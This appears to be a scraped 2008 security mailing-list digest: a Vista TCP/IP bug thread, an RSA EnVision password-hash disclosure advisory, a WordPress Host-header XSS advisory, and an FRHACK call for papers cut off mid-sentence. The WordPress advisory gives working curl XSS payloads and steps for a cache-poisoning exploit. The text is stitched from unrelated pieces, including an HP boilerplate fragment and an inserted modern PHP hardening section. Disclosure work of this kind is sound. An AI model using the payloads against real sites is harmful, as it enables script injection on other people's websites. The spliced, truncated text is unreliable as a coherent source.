System management and security procedures must be reviewed frequently to 
maintain system integrity. HP is continually reviewing and enhancing the 
security features of software products to provide customers 

Re: Microsoft VISTA TCP/IP stack buffer overflow

2008-11-25 Thread dale
So, let me try and understand this.

According to what you have written, and the MSDN documentation on this 
CreateIpForwardEntry2 call, you need to be (at least) a member of the 
Administrators group.

So how is this security vulnerability any different to me creating a program, 
which will require the same Administrative rights, to say, wipe the boot 
configuration file?


RSA EnVision Remote Password Disclosure

2008-11-25 Thread nicolas . viot
I. REFERENCE

Title: RSA EnVision Remote Password Disclosure
URL: http://www.secfault.org/?p=78

II. BACKGROUND

RSA EnVision, a product of RSA Security, is a platform allowing gathering and 
analysis of security events and logs.

RSA Security is a subsidiary company of EMC Corporation.

III. DESCRIPTION

The RSA EnVision platform provides a web console which enables administration 
of the solution and analysis of security events.

A vulnerability exists in this web application, allowing a remote anonymous 
attacker to retrieve the hash of the password used for authentication.

Using a dictionary or a brute-force attack against this hash, a remote attacker 
can gain administration privileges on the EnVision web console.

This vulnerability is due to a lack of access control on the user profile 
functionality.

Steps to reproduce:

The steps to reproduce the vulnerability will be disclosed November 28 2008.

IV. IMPACT

Successful exploitation allows remote attackers to gain access to the hash of 
the password used to authenticate users of the web console.

Using a dictionary or a brute-force attack against the retrieved hash, a remote 
attacker can gain administration privileges on the EnVision web console.

V. PRODUCT AFFECTED

The vulnerability was successfully exploited on enVision v3.7.0 Build: 0169.

EMC has reported the following versions to be affected:

RSA EnVision 3.5.0, 3.5.1, 3.5.2 and 3.7.0

VI. REMEDIATION

Apply the vendor patch corresponding to your version of RSA EnVision:

https://knowledge.rsasecurity.com/

VII. DISCLOSURE TIMELINE

10/30/2008 Initial vendor notification
10/31/2008 Initial vendor response
11/21/2008 Patch release and coordinated public advisory disclosure
11/28/2008 Detailed vulnerability information disclosure

VIII. VENDOR REFERENCE

EMC Security Alert (ESA) identifier : ESA-08-017

IX. CREDIT

This vulnerability was discovered by Nicolas Viot [EMAIL PROTECTED]

Intrinsec is a French company specializing in business continuity and security : 
http://www.intrinsec.com


WordPress XSS vulnerability in RSS Feed Generator

2008-11-25 Thread Jeremias Reith

= noXSS.org Security Advisory ==

Advisory: WordPress XSS vulnerability in RSS Feed Generator
Author: Jeremias Reith [EMAIL PROTECTED]
Published: 2008/11/25
Affected: WordPress < 2.6.5


Summary
===

WordPress prior to v2.6.3 fails to sanitize the Host header variable
correctly when generating RSS feeds and is therefore prone to XSS
attacks.

Web sites running in a name-based virtual hosting setup are not
affected as long as they are not the default virtual host.
Moreover, we only found installations running on the Apache web server
to be affected.


Vulnerability Details
===

The function self_link() in wp-includes/feed.php is used to generate
absolute URLs for the atom:link tag in ATOM and RSS 2.0 feeds:

function self_link() {
  echo 'http'
    . ( $_SERVER['https'] == 'on' ? 's' : '' ) . '://'
    . $_SERVER['HTTP_HOST']
    . wp_specialchars(stripslashes($_SERVER['REQUEST_URI']), 1);
}

The function does not sanitize the HTTP_HOST variable in any way but
WordPress replaces all $_SERVER variables with escaped ones in
wp-settings.php:

$_SERVER = add_magic_quotes($_SERVER);

In almost all setups add_magic_quotes() runs
mysql_real_escape_string() over the elements and returns the modified
array. Unfortunately this escaping method is not safe in markup
context.


PoC
===

The Apache web server only disallows '/', '\' and '..' within the host
header. The header can therefore contain markup making the following
PoC possible:

curl -H "Host: \"<body onload=alert(String.fromCharCode(88,83,83))>" \
http://www.example.org/blog/feed

The given example request will return (without additional newlines):

-- snip --
...
<atom:link href="http://\"<body onload=alert(String.fromCharCode(88,83,83))>/blog/feed" rel="self" type="application/rss+xml" />
...
-- snip --

The embedded JavaScript will be executed in Firefox 3.0.4 due to the
triggered switch to Quirks mode.


Exploit
===

The following exploit is a semi-stored XSS attack and has been tested
with the following setup:

- Apache 2.x with IP based virtual hosting
- WordPress 2.6.3 installed in /blog/
- WP Super Cache 0.84
- Firefox 3.0.4


WP Super Cache is a popular WordPress plugin that adds static file
caching to WordPress. It greatly increases performance and is
often used. It saves generated pages in the wp-content/cache directory
and adds mod_rewrite rules to serve cached pages statically.

Issuing a malicious request to a vulnerable WordPress installation
will lead to a file containing the XSS to be generated and placed
within the document root.

Request:
curl -H "Host: \"<body onload=alert(String.fromCharCode(88,83,83))>" \
http://www.example.org/blog/feed

Generated file:
http://example.org/blog/wp-content/cache/wp-cache-#md5sum#.html

Firefox will execute the embedded JavaScript even though the feed is
XML because the file is served as text/html.

The only missing step is the calculation of the cached file's MD5 sum.

The following code generates the MD5 checksum:

php -r 'echo md5("\"<body onload=alert(String.fromCharCode(88,83,83))>" . "/blog/feed"), "\n";'

In the default setup the MD5 sum can be generated by concatenating the
contents of HTTP_HOST and REQUEST_URI resulting in
0d2ca4617758433a7864d57493be2c5b for the given example.

This file can be accessed until the cache expiration mechanism removes
it. The default expire time is 3600 seconds.


Vendor Response
===
2008-11-17 Reported to vendor
2008-11-17 Initial response from vendor
2008-11-25 Release of version 2.6.5




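The root cause in the advisory above is a context mismatch: a value escaped for SQL (backslashing quotes) is emitted into XML markup, where backslashes mean nothing and angle brackets mean everything. The following is an added example, not code from the advisory or from WordPress, that puts the two escaping styles side by side and sketches a hardened way to build a feed's self link: the host comes from configuration rather than from the request, the request path is escaped for attribute context, and where a request host must be honoured it is checked against an allowlist first. All function names, the `$canonical_url` parameter and the sample Host value are assumptions for illustration.

```php
<?php
// Added example, not WordPress code. Demonstrates why SQL-style escaping
// does not protect markup and how to build a self link without reflecting
// the raw Host header. All names below are assumed for illustration.

// Constructed sample Host header carrying markup. The leading quote is
// what would close an href="..." attribute and let the tag take effect.
$hostile_host = '"<body onload=alert(1)>';

// Mirrors the SQL-style escaping the advisory describes: the quote gets a
// backslash, but '<' and '>' pass through, so a browser still sees a tag.
function sql_style_escape(string $value): string {
    return addslashes($value);
}

// Markup-context escaping: every character significant to HTML/XML
// attributes becomes an entity, so the value can only ever be text.
function markup_escape(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_XML1, 'UTF-8');
}

/**
 * Hardened self link. The host is taken from $canonical_url (assumed to be
 * the site's configured URL), not from the request, so the Host header
 * never reaches the output. Only the path and query of the request are
 * kept, and they are escaped for attribute context before being emitted.
 */
function safe_self_link(string $canonical_url, string $request_uri): string {
    $parts  = parse_url($canonical_url) ?: [];
    $scheme = $parts['scheme'] ?? 'http';
    $host   = $parts['host'] ?? 'localhost';
    $path   = parse_url($request_uri, PHP_URL_PATH) ?? '/';
    $query  = parse_url($request_uri, PHP_URL_QUERY);
    $uri    = $path . ($query !== null ? '?' . $query : '');
    return '<atom:link href="' . markup_escape($scheme . '://' . $host . $uri)
        . '" rel="self" type="application/rss+xml" />';
}

/**
 * If the request host must be used (e.g. several hostnames serve one
 * install), accept it only when it matches an allowlist; otherwise fall
 * back to the canonical host. Comparison is case-insensitive and ignores
 * an optional :port suffix.
 */
function trusted_host(string $request_host, array $allowed, string $fallback): string {
    $bare = strtolower(preg_replace('/:\d+$/', '', $request_host));
    return in_array($bare, array_map('strtolower', $allowed), true) ? $bare : $fallback;
}

// The first line still contains a live tag; the second is inert text.
echo sql_style_escape($hostile_host), "\n";
echo markup_escape($hostile_host), "\n";

// A self link that ignores the request host entirely.
echo safe_self_link('http://www.example.org', '/blog/feed?x=1'), "\n";

// The hostile value is not on the allowlist, so the fallback host is used.
echo trusted_host($hostile_host, ['www.example.org'], 'www.example.org'), "\n";
```

The cache-poisoning variant in the advisory depends on the same untrusted host ending up in a cache key and in a file served as text/html; keying the cache on the validated host (as `trusted_host()` returns it) rather than on the raw header removes the attacker's control over both the key and the content.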


Re: Microsoft VISTA TCP/IP stack buffer overflow

2008-11-25 Thread Edi Strosar
Administrator lives in Ring 3 while this crash happens in Ring 0.
Nobody, not even Admin, should be able to corrupt kernel space. It's
not a security issue per se - it's just a bug.



[EMAIL PROTECTED] wrote:

So, let me try and understand this.

According to what you have written, and the MSDN documentation on this 
CreateIpForwardEntry2 call, you need to be (at least) a member of the 
Administrators group.

So how is this security vulnerability any different to me creating a program, 
which will require the same Administrative rights, to say, wipe the boot configuration 
file?






[CFP] FRHACK 01 Call For Papers (save the dates!)

2008-11-25 Thread Jerome Athias
[CFP] FRHACK 01 Call For Papers

FRHACK: By Hackers, For Hackers! http://www.frhack.org

++
+ FRHACK 01
+ Call For Papers
+ September 7-8, 2009, at the Great Kursaal Hall of Besançon, France.
++

Do you like good wine, French bread & food, strikes and the French kiss?
If so, you will love FRHACK!

[ - Introduction - ]

FRHACK is the First International IT Security Conference, by hackers -
for hackers, in France!
FRHACK is not commercial - but - highly technical.

Target Audience: Security Officers, Security Professionals and Product
Vendors, IT Decision Makers, Policy Makers, Security-, Network-, and
Firewall Administrators, Teachers, Academic Researchers and Software
Developers.

The FRHACK Team (TFT) encourages speakers to present new and interesting
projects for FRHACK 01 and will give preferential treatment to
submissions that have not been presented at other conferences.
Further, TFT invites any individual who has not spoken at a conference
before to submit a talk and attempt to make FRHACK their inaugural event!
TFT encourages girls passionate about IT Security to submit papers, as TFT
will offer a prize to the Best IT Security girl of the year to reward
innovation.
Papers can be submitted in English and/or French.
The conference language is either English or French.

The conference will be held in Besançon - EU, East of France, close to
Switzerland, and aims to bring together industry, government, academia and
underground hackers to share knowledge and leading-edge ideas about
information security and everything related to it.
FRHACK will feature national and international speakers and attendees
with a wide range of skills.
The atmosphere is favorable to presenting all facets of the computer security
subject and will be a great opportunity to network with like-minded
people and enthusiasts.

[ - The venue - ]

FRHACK 01 (1st edition) will take place at the Great Kursaal Hall of
Besançon with capacity for up to 1400 people.

[*] About Besançon (stolen from http://en.wikipedia.org/wiki/Besan%C3%A7on)

Besançon is the capital and principal city of the Franche-Comté region
in eastern France. Located close to the border with Switzerland, it is
the capital of the Doubs department.
As well as being famed as one of France's finest villes d'art (art
cities), Besançon is the seat of one of France's older universities, of
France's National School of Mechanics and Micromechanics, and one of the
best known French language schools in France, the CLA. It is also
reputed to be France's most environmentally-friendly city, with a public
transport network that has often been cited as a model. On account of
the topography, the historic city centre lies at the edge of the modern
city, and hiking tracks lead straight from the centre and up into the
surrounding hills.
The Citadel of Besançon dates back to the Celtic era. In his De Bello
Gallico, Julius Caesar already said about the fortress of Vesontio
(Celtic name of Besançon) that it was one of the best defensive sites he
had ever seen.
Besançon is situated at the crossing of two major lines of
communication, the NE-SW route, following the valley of the river Doubs,
and linking Germany and North Europe with Lyon and southwest Europe, and
the N-S route linking northern France and the Netherlands with
Switzerland. A key staging post on the Strasbourg-Lyon (Germany-Spain)
route, it also has direct high-speed train (TGV) links with Paris,
Charles de Gaulle International Airport, and Lille. Unusually for a town
of its size, it does not have a commercial airport,